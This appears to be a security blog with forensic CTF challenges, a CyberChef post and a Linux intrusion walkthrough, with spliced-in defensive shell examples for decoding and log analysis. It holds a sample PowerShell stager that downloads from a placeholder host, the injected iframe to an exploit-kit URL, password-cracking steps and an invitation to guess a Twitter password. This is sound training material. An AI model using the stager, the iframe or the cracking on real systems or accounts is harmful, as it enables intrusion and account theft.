Friday, December 29, 2017

Network Forensic CTF - TufMups Undercover Operation


Disclaimer: This CTF scenario is satirical and doesn't represent anyone's opinion, about anything.


This is a network forensics CTF I set up recently for a team training event. It was well received and I think it is a bit of a laugh and challenge for a range of experience levels. I hope you enjoy it!


Background: You're an agent with a government law enforcement agency. You've been tracking a group of criminal hackers known as "TufMups". This group either keeps a low profile, your agency's capacity to run investigations on the internet is very poor, or some combination of those two factors. Up until two days ago you had an active relationship with an informant who went by the handle "K3anu". As you walked into your office you received a package containing a flash drive, a printed screenshot (at the top of this blog post) and a very short note. 

"Review this PCAP. It will all make sense. Woaaahhhh. - K3anu"

That package was the last you heard from K3anu.

DOWNLOAD EVIDENCE LINK  <-- Everything you need to answer the questions is in the PCAP. There is a server I left up which you can use to get a couple flags, but it's not intended to be hackable. It may be more fun to get the flag(s) directly from the webserver - so I'll leave it up! 


If you're approaching this new to either CTF or analyzing PCAPs I have a couple of tips:

  1. Use CyberChef and love it. I have a blogpost about it here
  2. Know and love Wireshark. There are other ways to approach a PCAP challenge, such as replaying the capture through Bro/Suricata/VortexIDS (thx to D.K. for this tip) or summarizing it with a command line tool like TShark, but that isn't strictly necessary.
  3. Find a tool to help crack zip files, and think about both brute force and dictionary attacks as viable strategies. There might be one in Kali Linux, and on other Linux distributions it may be just an "apt install" away :D.
  4. Metadata is always useful - make sure you have a tool to check for it.
  5. Read ahead through the questions if you're getting stuck. Use the screenshot at the top of the post as a starting point. Hit me up on Twitter for hints @securitymustard or to berate me.

Questions:

What is the start time of the PCAP ("Date and Time of Day" setting in Wireshark round to nearest second)?
What is the end time of the PCAP ("Date and Time of Day" setting in Wireshark round to nearest second)?
How many total packets were sent between the host and the hacker website IP?
What is the hostname of the system the PCAP was recovered from? (all caps)
What exact version of browser did K3anu use? (exact number only)
What operating system did K3anu use? (Name and number only)
How many DNS queries in the PCAP received NXdomain responses?
What is the hidden message in the TufMups website? (decoded)
What is the key to decode the secret message in the TufMups website?
How did K3anu get access to the file? (lowercase, just protocol)
What's the nickname of the operator on the IRC channel?
What is the 1st operation needed to decode the IRC users' "secure" comms? (just the format name)
What is the 2nd operation needed to decode the IRC users' "secure" comms? (just the format name)
What is the 3rd operation needed to decode the IRC users' "secure" comms? (just the format name)
What is the 4th and final operation needed to decode the IRC users' "secure" comms? (2 words lowercase)
What is the password to decrypt the zip file that was downloaded by K3anu?
How many total rows of "fullz" are represented in the file?
How many people in the fullz are named Joshua, have a MasterCard, and use an OS X system?
From the previous question (people named Joshua) - what is the most expensive car new in this filtered list?
What IP and port does the executable connect to? ip:port
What is the MD5 of the executable?
What was used to compile the malicious executable?
What executable did K3anu likely use to download files from the remote server? (exactly as written in source material)
What is the host system's exact BIOS version?
What is the filename of the first file taken from K3anu's computer?
What is the filename of the second file taken from K3anu's computer?
What utility was used to steal the files from K3anu's computer?
What destination port was used to steal the files from K3anu's computer?
What is the password to decrypt the file stolen from K3anu's computer? (it's lowercase)
What is K3anu's real identity?
What city is K3anu likely to be in?
What is K3anu's likely status? (lowercase)
What is the address of the restaurant closest to where K3anu is likely to be? (exactly as reported by Google maps)
The hacker left a message for law enforcement on K3anu's system, what was it? (message only)


DOWNLOAD ANSWERS LINK : Don't get too hasty looking up the answers! You can always ping me on Twitter @securitymustard for hints :D.

Monday, November 13, 2017

DFIR CTF: Precision Widgets of North Dakota Intrusion


Hi all, it's time for me to create a new DFIR CTF so I'm releasing my previous one to the public. Please if you're playing this and have some fun/see some value send me feedback @securitymustard and what you'd like to see in future DFIR games.

Note that some of the infrastructure for this (OSINT component, company website, etc.) is no longer hosted. This doesn't make the game unplayable; it was mostly just eye-candy. There is also a Twitter account you can get access to in the course of this. It's not a big deal if it were ransacked (if it hasn't been already), but please respect others and don't ruin the game.

Background:
Precision Widgets of North Dakota is a manufacturer of high tech precision aircraft and mobility parts primarily for government customers across the globe. PWND owns patents for several processes and designs which are the foundation of their brand and their most precious asset.

PWND was recently outbid on a contract to manufacture 150,000 Rascal scooter performance exhaust systems for the local government of Fort Lauderdale Florida. Due to PWND's previous success in this area and substantial cost advantages in the market PWND's CEO and founder Billy Honeydew immediately suspects foul play.

You are an incident response consultant from Johnson and Johnson and Johnson LLP tasked with discovering if there was data stolen from the PWND network, and if so how.

Evidence Downloads: 
Note: Decrypt password is "nolycasissor" (Ross is a Cylon backwards.. don't ask?)



Questions (recommended points, KC phase, question):

  1. 25 Recon What is the internal IP address of PWND-CEO? 
  2. 25 Recon What is the internal IP address of PWND-ITADMIN? 
  3. 25 Recon What is the internal IP address of PWNDDC01? 
  4. 25 Recon What is the full name of the domain? 
  5. 25 Recon What is Billy Honeydew's Twitter handle (no @)? 
  6. 25 Recon What is the Twitter handle of the individual he talks to (no @)? 
  7. 25 Recon What is the full link to the malware (unshortened)? 
  8. 50 Delivery What is the time in UTC (MM/DD/YYYY HH:MM) of the initial malware delivery? 
  9. 50 Delivery What is the time in UTC (MM/DD/YYYY HH:MM) of the payload download on PWND-CEO? 
  10. 75 Weaponization What type of payload is the malware (exactly as you'd see it in the builder)? 
  11. 25 C2 What is the IP of the C2 server? 
  12. 25 C2 What destination port is being used by the malware (format port/protocol)? 
  13. 50 C2 What is the time in UTC (MM/DD/YYYY HH:MM) of the first connection of pwnd-ceo to the C2? 
  14. 50 C2 What is the time in UTC (MM/DD/YYYY HH:MM) of the first connection of pwnd-itadmin to the C2? 
  15. 50 C2 What is the time in UTC (MM/DD/YYYY HH:MM) of the first connection of pwnddc01 to the C2? 
  16. 50 Installation What PID is the malware running under on PWND-CEO? 
  17. 50 C2 How many packets were transferred between PWND-CEO and the C2 IP? 
  18. 50 Actions on Objectives How much data (round to nearest MB) was transferred from the system that data was exfiltrated from? 
  19. 25 Installation What data stream of the payload on disk indicates where it came from? 
  20. 50 Actions on Objectives What is the filename of the staging tool used? 
  21. 50 Actions on Objectives What is the true application name of the staging tool? 
  22. 75 Actions on Objectives What is the mistaken name the attacker named the staging tool before changing it?
  23. 75 Actions on Objectives What command had resulted in the domain admin credential being stored in memory? 
  24. 50 Actions on Objectives What is the password for the bhoneydew domain account? 
  25. 50 Actions on Objectives What is the password for the pwnddc01 domain account? 
  26. 50 Actions on Objectives What is the password for the cmaldonado domain account? 
  27. 25 Actions on Objectives What protocol was used to transfer payloads laterally (1 guess)? 
  28. 25 Actions on Objectives What is the filename used as a payload in lateral movement? 
  29. 50 Actions on Objectives What time was the payload transferred to 192.168.64.137?
  30. 50 Actions on Objectives What time was the payload transferred to 192.168.64.149? 
  31. 50 Actions on Objectives What protocol was used to execute payloads remotely? 
  32. 100 Installation In the decoded payload instructions that would be run on a x86 system, what is the exact path defined in "DownloadData"? 
  33. 100 Actions on Objectives Try to login to the malicious user's twitter account - what is the password (2 guesses)? Note: Do not tweet, delete tweets, delete the account, or otherwise ruin the challenge for others.  
  34. 150 Actions on Objectives Who is the bad guy in this case (1 try)? 
  35. 25 Recon What is the active time bias running on PWNDITADMIN? 
  36. 25 Installation What is the name of the process on PWNDITADMIN that has executable injected code? What is the 2 byte hex string that indicates this to you? Answer in form processname,hexbytes    
  37. 50 Installation What is the size in bytes of the file uploaded by the hacker to PWNDITADMIN? Based upon the differences in the created, modified and accessed times what file operation do you theorize was used to put it there? Format: size,operation    
  38. 50 Actions on Objectives What is the total number of files inside the exfiltration archive?
  39. 50 Actions on Objectives What is the most concerning folder name that was exfiltrated? 



Saturday, June 10, 2017

CyberChef: Example DFIR Use Cases

GCHQ released CyberChef late last year which is an excellent tool for data manipulation and analysis. My perception was that this was primarily observed by the hacker and CTF community as a new must have tool for solving puzzles, but I didn't see many DFIR analysts commenting that this is now an important part of their toolbox.

The tool intends to be a Swiss army knife for encryption, compression, encoding, and string manipulation functionality for hackers and tinkerers. The majority of the time I use this tool it's out of convenience to convert Hex, Base64, or decompress data. Outside of standard conversions this tool has provided me value due to the large number of options, flexible pipeline which promotes experimental discovery, and simple interface for reviewing output.

This tool is free, lightweight, and can be easily hosted locally and shared by all analysts working a case. It's been a huge benefit to my team at work as we've analyzed cases with obfuscated PowerShell commands and encryption in use.

Link to demo and download:
https://github.com/gchq/CyberChef

I'll lead with a fairly real world example of where this is useful. The following screenshot is from a Veil Evasion PowerShell Meterpreter payload I just created. This is a reverse shell that utilizes an encoded and compressed PowerShell command. If all you had was the payload, the way to derive useful information from it may not be clear as you need to decode and decompress the payload inline. CyberChef makes decoding this command from Base64 and decompressing simple. It's easy to see the IP (100.100.100.100), User agent (Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)), and port (1337) to be used by the payload using this tool.
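As an added example (not code from the original post), here is the same decode done at the shell for the two encoded shapes you meet most often in a PowerShell launcher: a -EncodedCommand argument (Base64 of UTF-16LE text) and a Base64-wrapped gzip stream fed to IEX. The sample script and its indicators are constructed to mirror the screenshot; the block assumes GNU base64, gzip and iconv are installed and that the compressed layer is gzip (Veil stagers may also use raw Deflate, which needs a zlib-aware tool instead).

```shell
#!/bin/sh
# Added example (not from the original post): shell decoders for the two
# encoded PowerShell shapes CyberChef handles in the screenshot above.
# Assumptions: GNU coreutils base64, gzip and iconv are available, and the
# compressed layer is gzip (raw Deflate needs a zlib tool such as zlib-flate).

# Shape 1: powershell -EncodedCommand <Base64 of the script as UTF-16LE>
decode_encoded_command() {
    printf '%s' "$1" | base64 -d | iconv -f UTF-16LE -t UTF-8
}

# Shape 2: IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream(
#   [IO.MemoryStream][Convert]::FromBase64String('...'), Decompress))).ReadToEnd()
decode_gzip_b64() {
    printf '%s' "$1" | base64 -d | gzip -dc
}

# Pull the network indicators out of the decoded script: IPv4 addresses
# with an optional :port, deduplicated.
extract_iocs() {
    grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}(:[0-9]{1,5})?' | sort -u
}

# Constructed sample: roughly what a reverse-HTTP stager looks like once decoded.
SAMPLE_SCRIPT='$wc=New-Object Net.WebClient;$wc.Headers.Add("User-Agent","Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)");$wc.DownloadString("http://100.100.100.100:1337/x")'

# Build both encoded forms the way the launcher would, so the decoders can be checked.
ENCODED_CMD=$(printf '%s' "$SAMPLE_SCRIPT" | iconv -f UTF-8 -t UTF-16LE | base64 -w0)
GZ_B64=$(printf '%s' "$SAMPLE_SCRIPT" | gzip -c | base64 -w0)

if [ "${1:-}" = "demo" ]; then
    echo "EncodedCommand form:"; decode_encoded_command "$ENCODED_CMD" | extract_iocs
    echo "gzip+Base64 form:";    decode_gzip_b64 "$GZ_B64" | extract_iocs
fi
```

Run it with the argument demo to see both decoders recover the 100.100.100.100:1337 indicator. When a real payload decodes to binary junk instead of text, the compressed layer is usually raw Deflate rather than gzip; CyberChef's "Raw Inflate" is the equivalent of that step.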


Timezone and format conversion: It's common to work cases as a team including evidence in multiple timezones. I also believe it's common to have mistakes made with incorrect mental math converting timezones. This feature is convenient for consistent conversion of format and timezone.

Exif Extract: ExifTool is probably the most common tool DFIR analysts use to extract metadata from images, but it is a standalone command line tool. If you're only concerned with Exif from a small number of files this may be a more convenient option. The "Other->Extract Exif" option will pull Exif data from JPEG, TIFF and audio files.

Encryption/Decryption: There are plenty of simple encrypted artifacts that we've come to expect our tools to automatically decrypt for us. It's fairly common to encounter encrypted commands, network artifacts and files during intrusion cases so this can be a very vital feature. See below the simplest example - Rot13 on a UserAssist key.

IP format conversion: Occasionally I see an analyst get tripped up by IP's in decimal format (to be fair - that was me at one point too). Have no fear.

IP subnet tasks: Occasionally I find tools that don't take a subnet and require a list of IP addresses. This feature easily prints a list of IP's from a subnet for masks 32 (lol) down to 16. Obviously this is easy to do otherwise for a /24 (bashy code: "for i in {1..255}; do echo 10.0.0.$i;done") but gets trickier to script with oddball masks. Additionally this "Networking" section works as a subnet calculator, can group a list of IP's into subnets, handle URL encoding.. Very multipurpose!
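The two conversions described above (decimal IPs, and expanding a subnet with an arbitrary mask) are easy to get wrong by hand, so here they are as shell functions. This is an added example, not code from the original post or from CyberChef; it uses only shell arithmetic, so it runs offline, and it caps the mask at /16 the same way CyberChef does.

```shell
#!/bin/bash
# Added example (not from the original post): decimal <-> dotted-quad IP
# conversion and CIDR expansion with shell arithmetic only.

# Dotted quad -> 32-bit decimal, the form some logs and malware configs use.
ip2dec() {
    local a b c d
    IFS=. read -r a b c d <<EOF
$1
EOF
    echo $(( (a << 24) | (b << 16) | (c << 8) | d ))
}

# 32-bit decimal -> dotted quad.
dec2ip() {
    local n=$1
    echo "$(( (n >> 24) & 255 )).$(( (n >> 16) & 255 )).$(( (n >> 8) & 255 )).$(( n & 255 ))"
}

# Print every address in a CIDR block, network and broadcast included,
# e.g. cidr_hosts 10.0.0.0/30. Masks shorter than /16 are refused so a
# typo like /1 can't flood the terminal (the same limit CyberChef applies).
cidr_hosts() {
    case "$1" in
        */*) ;;
        *) echo "expected a.b.c.d/nn" >&2; return 1 ;;
    esac
    local net=${1%/*} mask=${1#*/}
    if [ "$mask" -lt 16 ] || [ "$mask" -gt 32 ]; then
        echo "mask must be between /16 and /32" >&2
        return 1
    fi
    # Network address: clear the host bits of whatever address was given.
    local start=$(( $(ip2dec "$net") & (4294967295 << (32 - mask)) & 4294967295 ))
    local count=$(( 1 << (32 - mask) ))
    local i=0
    while [ "$i" -lt "$count" ]; do
        dec2ip $(( start + i ))
        i=$(( i + 1 ))
    done
}
```

Note that cidr_hosts normalizes the input first, so "10.0.0.5/30" prints 10.0.0.4 through 10.0.0.7 rather than starting from .5; that is the behaviour you want when feeding a tool that refuses CIDR notation.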

Code Beautification: This is a pretty common DFIR struggle, coming across Javascript or other code that is in one continuous block and trying to make sense of it. Many times a debugger or console is the correct answer, but sometimes just "beautifying" the code helps you find answers.

Utils tab: The "Utils" tab is useful for string manipulation. In the below example we're counting how many times the character "4" appears in a string. There's also options to diff, toUpper, toLower, reverse, sort, unique, remove whitespace, find/replace and many more! This is all great functionality that generally can be done from a CLI but sometimes this is the most convenient means.

Extract dates: This can be useful in certain types of evidence that isn't in a standard log format. For an example I used a snippet from a setupapi.log (plug and play log, generally used to show the first and last times a specific USB was connected). Chef also has a variety of other prebuilt regex extractors that could speed up your analysis including IP's, Email, URL's, File Paths, and more. You can also create your own regex based extractor so the sky is the limit.

Check Entropy: This could be useful if you're trying to make a point about a simple password, identify encrypted material, and potentially other uses I haven't come across. You might pick up that I don't use this often, but I think it's pretty cool that it's in the tool.

TL;DR - If you haven't yet, try CyberChef, the list of capabilities will likely impress you.

Wednesday, March 22, 2017

Walkthrough: Forensic CTF - Bob's Chili Burgers Website Hacked

I'm really pumped that I had two requests to walk through this forensic CTF I made last year. I created this one for a ~4hr CTF event in a SOC and it was well received. Many SOC analysts have done Windows compromise cases but are still waiting for that fateful day when the China SSH bots finally guess a root password ("Letmein!12", unguessable!) on the one Linux server exposed to the internet without certificate authentication. This is an introductory Linux forensics case and I hope you had/have some fun with it. 😊

We'll address each question in order using the SIFT workstation VM.

Mounting the Image on SIFT or Kali (both mount points must already exist):
  1. Place the image in your /cases directory
  2. sudo su   # become root
  3. ewfmount /cases/BobsFamousChiliCase_Logical.E01 /mnt/ewf_mount1/ # Expose the E01 as a raw image file (ewf1) under /mnt/ewf_mount1/
  4. mount -t ext4 -o ro,loop,noexec,noload /mnt/ewf_mount1/ewf1 /mnt/e01 # Mount the raw image read-only in /mnt/e01. "noload" tells ext4 not to replay the journal, which it would otherwise try to do (and fail, on a read-only image) if the filesystem wasn't cleanly unmounted; "noexec" stops you accidentally running the attacker's binaries off the evidence.


Questions:

1. Verify SHA1 Checksum of the image provided:
This is easily done in most Linux distributions out of the box with the "sha1sum" tool. You could also do this on your Mac terminal easily using "shasum", or on Windows PowerShell using "Get-FileHash -Algorithm SHA1 C:\path\to\file.ext".


Answer: c67d36f2a8851fdf9bb3de9fd0441b619e40c070

2. Through what protocol was this system compromised? 
The question is a little ambiguous, but this is pretty easy to figure out. With Linux intrusion cases I start in "/var/log" (where most logs are stored by default).

A directory listing of the /var/log on this system shows that the logs are very small in size, indicating this system is likely lightly used. This should make it easier to identify malicious activity because we don't have to sift through gigabytes of old log data.


auth.log is a logical first log to review as it contains the authentication events, including sshd logins and user/group changes. A quick line count (wc -l) shows this is a very short log and something we can review line by line in a minute.


A quick grep for "Accepted" and "Failed" logins (command: grep -E "Failed|Accepted" auth.log. Breakdown: -E is extended regex, which amongst other things lets us give multiple pipe delimited patterns) shows us what we need. There are a series of RFC1918/local logins, followed by internet based failed logins, and finally a root login from 5.101.65.141 at 20:03:45.


The answer to this question is simply "SSH".

3. What distribution and version is this system?
Two of the most common initial Linux enumeration commands are "cat /etc/issue" and "uname -a", which between them give the distribution version, kernel version, hostname, architecture, etc. "uname" reports on the running kernel, so it's no use against a dead image, but /etc/issue (and /etc/lsb-release on Ubuntu) are plain files we can read straight from the mounted image.


Answer: Ubuntu 14.04.4 LTS

4. What country is the attacker's IP address from? 

In question 2 we identified 5.101.65.141 as the attacking IP address. There are tons of online resources we could use to identify the country this IP is assigned to (robtex, domaintools, etc) but pretty much all of these will use whois on the backend. Quickest way is to simply "whois 5.101.65.141".


Answer: It's always Russia, am I doing this right? 😐

5. What time was the attacker account created in UTC (XX:XX:XX format)?

This is another one we can find easily in the auth.log. User "radvlad" was created on "Jun 1 20:11:03"


Answer: Jun 1 20:11:03

6. What port is the protocol used to compromise the system set on?

sshd stores its configuration in /etc/ssh/sshd_config. Let's search that file for "port" (note: the -i flag to grep makes the pattern case insensitive, usually a good idea when you know a keyword but not its case).


Answer: 422

7. How many different countries are represented by the IP's in the web server log?

Ok here's the first one where we get to have a little command line fun. Apache2 is installed, which stores its logs in /var/log/apache2. The "access.log" is clearly the one being asked about as it shows who visited and made requests on the web server. We'll need to use some coreutils to quickly find this answer:

First thing I'd do is look at a "tail" of the log to see the format:

Boom, very first item is the IP address. Lets see how many unique IP's there are using the cut command to show us only the text that appears before the first space (cut -d" " -f1), sort to put the resulting IP's in order, then uniq to show us only unique IP's in that list:


We can disregard the ::1 and the RFC1918 address, so that leaves us 7 unique IPs. Originally when I created this challenge I did something cool like the below:


But as you can see I got some "connection refused" items and I'm generally not confident with the result. Sometimes we have to follow the "KISS" model and just use a known quantity like MXToolbox ( https://mxtoolbox.com/BulkLookup.aspx ).


Answer: 6
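The cut/sort/uniq pipeline above works, but the loopback and RFC1918 filtering was done by eye. As an added example (not part of the original walkthrough), here it is as shell functions that do that filtering automatically, so the remaining list can be handed straight to a whois loop or a bulk lookup such as MXToolbox. The log lines are constructed in Apache combined format and are not the case's real log.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): unique client IPs from
# an Apache access.log, with loopback and RFC1918 addresses removed.
# The log below is constructed for the example.

SAMPLE_LOG=$(cat <<'EOF'
203.0.113.7 - - [01/Jun/2016:20:05:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.25 - - [01/Jun/2016:20:05:09 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "curl/7.47.0"
::1 - - [01/Jun/2016:20:06:00 +0000] "GET /server-status HTTP/1.1" 200 1024 "-" "Apache/2.4"
198.51.100.42 - - [01/Jun/2016:20:07:13 +0000] "GET /setup.exe HTTP/1.1" 200 691128 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Jun/2016:20:08:44 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jun/2016:20:09:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Wget/1.17"
172.16.4.9 - - [01/Jun/2016:20:09:30 +0000] "GET / HTTP/1.1" 200 512 "-" "Wget/1.17"
172.32.4.9 - - [01/Jun/2016:20:09:31 +0000] "GET / HTTP/1.1" 200 512 "-" "Wget/1.17"
EOF
)

# Every distinct client address, exactly as in the walkthrough:
# first field, sorted, deduplicated. Reads the log on stdin.
unique_ips() {
    cut -d' ' -f1 | sort -u
}

# Same list minus IPv4/IPv6 loopback and the three RFC1918 ranges.
# 172.16.0.0/12 only covers 172.16 through 172.31, so 172.32.x.x is public
# and must survive the filter; a naive "172." prefix would drop it.
unique_public_ips() {
    unique_ips | grep -Ev '^(::1|127\.|10\.|192\.168\.|172\.(1[6-9]|2[0-9]|3[01])\.)'
}

# How many addresses actually need a country lookup.
count_public_ips() {
    unique_public_ips | wc -l | tr -d ' '
}

# Usage against a real log: unique_public_ips < /mnt/e01/var/log/apache2/access.log
# then: for ip in $(unique_public_ips < access.log); do whois "$ip" | grep -i '^country'; done
```

The whois loop in the trailing comment is where the "connection refused" noise in the screenshot above comes from; rate limiting from whois servers is normal, so for more than a handful of addresses a bulk service or a local GeoIP database is the dependable route.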

8. What date and time (directly copy/paste from log) did the attacker first log in?

Another one we've already answered via auth.log.


Answer: Jun 1 20:03:45

9. What is the IP that failed to log in directly before the attacker successfully logged in? 

Another simple auth.log request. Now this one I could see someone contesting as the "attacker IP" technically failed to login directly before they succeeded in guessing the password. I was looking for the other IP that tried to login right before.


Answer: 107.150.94.4
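Questions 2, 5, 8 and 9 all come out of auth.log with the same grep, so here is that grep turned into small reusable checks. This is an added example, not part of the original walkthrough; the log lines are constructed in the Ubuntu 14.04 auth.log format and are not the case's real log, and the "IP that failed directly before" logic follows the walkthrough's reading of question 9 (skip the attacker's own failed guesses).

```shell
#!/bin/sh
# Added example (not from the original walkthrough): auth.log checks for the
# first external login, its source, the preceding failed IP, and account creation.
# The log below is constructed in Ubuntu 14.04 auth.log format.

SAMPLE_AUTH=$(cat <<'EOF'
Jun  1 19:58:02 bobschili sshd[1201]: Accepted password for bob from 192.168.1.25 port 51022 ssh2
Jun  1 20:01:10 bobschili sshd[1290]: Failed password for root from 107.150.94.4 port 40211 ssh2
Jun  1 20:03:40 bobschili sshd[1302]: Failed password for root from 5.101.65.141 port 33190 ssh2
Jun  1 20:03:45 bobschili sshd[1302]: Accepted password for root from 5.101.65.141 port 33190 ssh2
Jun  1 20:11:03 bobschili useradd[1340]: new user: name=radvlad, UID=1001, GID=1001, home=/home/radvlad, shell=/bin/bash
EOF
)

RFC1918='from (10\.|192\.168\.|172\.(1[6-9]|2[0-9]|3[01])\.)'

# Q8: timestamp of the first successful login from a non-private address.
# awk reprints the fields so the double space in "Jun  1" collapses.
first_external_login() {
    grep 'Accepted' | grep -Ev "$RFC1918" | head -n 1 | awk '{ print $1, $2, $3 }'
}

# Q2/Q4 pivot: the address that made that login.
first_external_login_ip() {
    grep 'Accepted' | grep -Ev "$RFC1918" | head -n 1 | sed -E 's/.* from ([^ ]+) .*/\1/'
}

# Q9: source of the last failed attempt from a *different* address before
# that success. Remembers every failed source, then walks back from the
# first external Accepted, skipping the attacker's own failed guesses.
failed_ip_before_login() {
    awk '
        /Failed password/ { for (i = 1; i <= NF; i++) if ($i == "from") fails[++n] = $(i + 1) }
        /Accepted password/ {
            for (i = 1; i <= NF; i++) if ($i == "from") ip = $(i + 1)
            if (ip !~ /^(10\.|192\.168\.|172\.(1[6-9]|2[0-9]|3[01])\.)/) {
                for (j = n; j >= 1; j--) if (fails[j] != ip) { print fails[j]; exit }
                exit
            }
        }'
}

# Q5/Q11: when a given account was added, straight from useradd's log line.
account_created() {
    awk -v u="$1" '$0 ~ ("new user: name=" u ",") { print $1, $2, $3; exit }'
}

# Usage on the mounted image, e.g.:
#   first_external_login < /mnt/e01/var/log/auth.log
#   account_created radvlad < /mnt/e01/var/log/auth.log
```

Two caveats a practitioner would want: syslog timestamps carry no year and no timezone, so the "UTC" in question 5 relies on the box's /etc/timezone being UTC (check it on the image rather than assuming); and a "Failed password" from the attacker's own address right before the "Accepted" is the normal signature of a successful guess, which is why the walkthrough looks past it.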

10. What day of the week does the attacker's cron job fire?

User cron files are located in "/var/spool/cron/crontabs". In this folder we see one file "root".  In this text file we see just one cron job defined:


Aha! The jerk set a cron job to use netcat to send a reverse shell to his IP address on a recurring basis. Quick review of the cron format (image credit: https://en.wikipedia.org/wiki/Cron) shows that the command is set to run the 30th minute, on the 17th hour, on any day of any month, but only on Mondays.


Answer: Monday



11. What is the name of the user account the attacker made?

Another we already answered: radvlad


Answer: radvlad

12. The attacker set a password for the account that they made, what is it set to?

Woot, we get to use our basic attacker toolkit now to crack some passwords for #12-13. John the Ripper is the classic choice for cracking the shadow file from a Linux box and would be my choice. 

You can quite simply run "john ./etc/shadow" from the root of the mounted image to start cracking the passwords from the box. These passwords are thankfully quite simple and can be cracked with the default profile in John, however if you want to crack them FAST (like if you were in a CTF) use a wordlist such as rockyou.txt as a starting point. Note that most real CTFs ensure passwords aren't in rockyou, CrackStation, etc. to make it more difficult and require some thought on your part.

I first ran john with the default profile and it quickly found the "radvlad" password but was hanging on the others (we're only asked to get the root and radvlad passwords, not necessarily bob). I decided to download rockyou.txt and see if that worked.



Answer: 1qaz2wsx

13. The attacker changed the root password, what is it set to?

See the screenshots for #12.

Answer: asdzxc

14. What addition to the website is causing users to get redirected to malicious pages?

We've already learned a lot about this system that helps us start this question. We know the server is running Apache2, so we can expect to see the webroot in /var/www by default. We know the times the attacker was logged in, and we know he was logged in as root. 

Couple of different paths to follow to fully answer this one:

Root command line history: Lets verify if there are any hints in the .bash_history for the root user.


Well this is quite obvious: the attacker used echo to append an iframe pointing at a suspicious link to the index.html file. He also appreciated the 1337 password that had been set for root and saw fit to taunt the administrators, what a scalawag! 

Let's verify this by doing a tail on the index.html file in /var/www/html.


Answer: <iframe src="http://anecdote.roobaroo.org/xegblh2.html"></iframe>

15. What exploit kit is the link associated with?

This question is actually a little harder than it was when the challenge was fresh. At the time the challenge was made this was an actively tracked EK link in sites like Malware Domain List. Even still, a quick Google search for the full URL will get you the answer.



Answer: Angler

16. What is the sha256 hash of the first file the attacker added to /var/www/html?

There are a couple of .exe files in /var/www/html. The question here is which was added first? The default "ls -l" output shows the last modified time (mtime) of each file. That isn't useful here because one of the files was last modified back in April: mtime is carried over from the source when a file is moved, or copied with its timestamps preserved, so it tells us when the file was last edited, not when it landed in this directory. To overcome this let's look at the output of the "stat" command for both files, which also shows the inode change time (ctime), then do a sha256sum for both files.


We can see "setup.exe" has an access time and ctime of 00:21:39, which is earlier than the 00:21:58/00:22:13 of setup_20001.exe. The ctime can't be set by touch or preserved by cp/mv, which is why it's the one to trust here.

Answer: 94ebd2af4d1e1e4d01c4806cf1d94c44d24014da0703424f864e5e8cd3396fb9  setup.exe
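To see the mtime/ctime distinction for yourself, here is an added example (not code from the original walkthrough) that builds a scratch webroot with back-dated modification times, then orders the files by ctime the way the stat comparison above does. It assumes GNU stat and touch (Linux, e.g. the SIFT VM) and uses two throwaway files rather than the case's binaries.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): why "ls -l" misleads
# on "which file arrived first", and how to order by ctime instead.
# Assumes GNU coreutils (stat -c, touch -d).

# Build a scratch directory with two files whose mtimes are back-dated,
# as files copied in with cp -p or moved with mv keep their original mtime.
# Note the file placed FIRST gets the NEWER mtime, so mtime ordering lies.
make_webroot() {
    dir=$(mktemp -d)
    printf 'first\n' > "$dir/setup.exe"
    touch -d '2016-06-01 00:00:00' "$dir/setup.exe"       # mtime back-dated; ctime stays "now"
    sleep 1                                                # so the two ctimes differ by a second
    printf 'second\n' > "$dir/setup_20001.exe"
    touch -d '2016-04-10 09:00:00' "$dir/setup_20001.exe"  # looks older by mtime, placed later
    echo "$dir"
}

# Every file in the directory, oldest ctime first, with the human-readable
# ctime alongside. ctime records when the inode last changed on THIS
# filesystem and cannot be set from userland with touch.
by_ctime() {
    stat -c '%Z %z %n' "$1"/* | sort -n | cut -d' ' -f2-
}

# Just the name of the file that arrived first, by the same rule.
first_added() {
    stat -c '%Z %n' "$1"/* | sort -n | head -n 1 | cut -d' ' -f2- | sed 's#.*/##'
}

# Hash what you found, as the question asks.
hash_first_added() {
    sha256sum "$1/$(first_added "$1")" | cut -d' ' -f1
}

if [ "${1:-}" = "demo" ]; then
    d=$(make_webroot)
    echo "ls -lt (mtime, misleading):"; ls -lt "$d"
    echo "by ctime (trustworthy):";     by_ctime "$d"
    echo "first added: $(first_added "$d")  sha256: $(hash_first_added "$d")"
    rm -rf "$d"
fi
```

On the demo directory ls -lt ranks setup_20001.exe as the older file, while by_ctime correctly puts setup.exe first, the same inversion the case exhibits. Keep in mind that ctime is only as good as the filesystem it lives on: if the attacker extracted a tarball the ctime is still the extraction time, but if the whole directory was restored from an image, every ctime is the restore time.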

17. What is the ClamAV name for the second file the attacker added to /var/www/html?

This is as simple as doing a Virustotal.com search for the hash of the setup_20001.exe file. Alternately you could install ClamAV and run it against the file, but there's no guarantee that would still be accurate so long after this challenge was created.


Answer: Win.Trojan.691128-1

18. What file was exfiltrated? && 19. What command line tool did the attacker use to exfiltrate the file?

We saw that the attacker apparently didn't clean up the .bash_history for the root user, so lets head back there.


Woot, there's the answer to both 18 and 19. The user uploaded the "Secret-Recipe-Chili" to Pastebin.com using the "pastebinit" tool.

Answer 18: Secret-Recipe-Chili
Answer 19: pastebinit

20. BONUS: URL for the exfiltrated file?

I honestly don't think this one is possible to answer anymore. I can't find the paste. It must have been cycled out for more interesting pastes :-).

That's it! Hope this helps someone. Please leave me feedback if you have better ways to work the case, ideas for new comedy themed DFIR practice material, or any questions.



Sunday, March 19, 2017

Answers: Forensic CTF - Bob's Chili Burgers Website Hacked

Emma V writes:
Hey, will you post the answers ?

Answer: Yes! Sorry I hadn't posted them previously. Glad you worked the case, hope you had fun. Let me know if there's any interest on a walkthrough for this one, I'd be happy to put one together.

  1. Verify SHA1 Checksum of the image provided: c67d36f2a8851fdf9bb3de9fd0441b619e40c070
  2. Through what protocol was this system compromised? SSH
  3. What distribution and version is this system? Ubuntu 14.04.4 LTS
  4. What country is the attacker's IP address from? Russia
